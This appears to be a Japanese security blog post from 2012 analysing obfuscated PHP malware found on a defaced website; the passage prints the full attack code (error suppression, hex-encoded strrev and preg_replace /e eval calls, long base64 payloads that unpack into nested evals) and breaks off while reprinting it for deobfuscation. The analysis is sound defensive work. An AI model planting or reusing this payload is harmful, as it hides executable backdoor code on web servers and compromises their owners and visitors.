セキュリティ

そらいさんのサイトが改竄されたそうなので解析してみた

2012年1月23日

そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。

 

 

ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww

 

問題のコード

問題のコードはこれです。

<?php
@error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
    $eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";
    $eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
    $eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
    $eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
    $eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
    $eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
    $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
    $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
    $eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
    $eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
    $eva1tYldakBcVSir = "";
    $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
    $eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
    $eva1tYldakBoVS1r = "\x65\143\x72\160";
    $eva1tYldakBcVSir = "";
    $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
?>

 

これを展開していきます。

<?php
 @error_reporting(0);
 if (!isset($eva1fYlbakBcVSir)) {
 //$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4z